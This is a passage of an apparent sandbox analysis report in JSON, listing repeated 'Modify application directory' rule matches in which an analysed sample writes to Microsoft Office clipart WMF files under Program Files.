office\\clipart\\pub60cor\\na00454_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40089", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00454_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00458_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00458_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40096", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00458_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00462_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00462_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40103", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00462_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00487_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00487_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40112", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00487_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00494_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00494_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40119", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00494_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00512_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00512_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40126", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00512_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00523_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00523_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40133", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00523_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00525_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00525_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40142", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00525_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00530_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00530_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40151", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00530_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00532_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00532_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40160", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00532_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00538_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00538_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40167", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00538_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00641_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00641_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40176", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00641_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00784_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00784_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40183", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00784_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00798_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00798_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40192", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00798_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00806_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00806_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40199", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00806_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00807_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00807_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40206", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00807_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00808_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00808_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40213", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00808_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00809_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00809_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40220", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00809_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00810_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00810_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40227", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00810_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00932_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00932_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40234", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00932_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01064_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01064_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40241", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01064_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01066_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01066_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40250", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01066_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01069_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01069_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40259", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01069_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01123_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01123_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40266", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01123_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01126_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01126_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40273", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01126_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01130_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01130_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40280", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01130_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01141_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01141_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40287", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01141_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01148_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01148_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40294", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01148_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01149_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01149_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40301", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01149_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01152_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01152_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40308", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01152_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01154_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01154_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40315", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01154_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01157_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01157_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40322", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na01157_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01158_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01158_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40329", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program 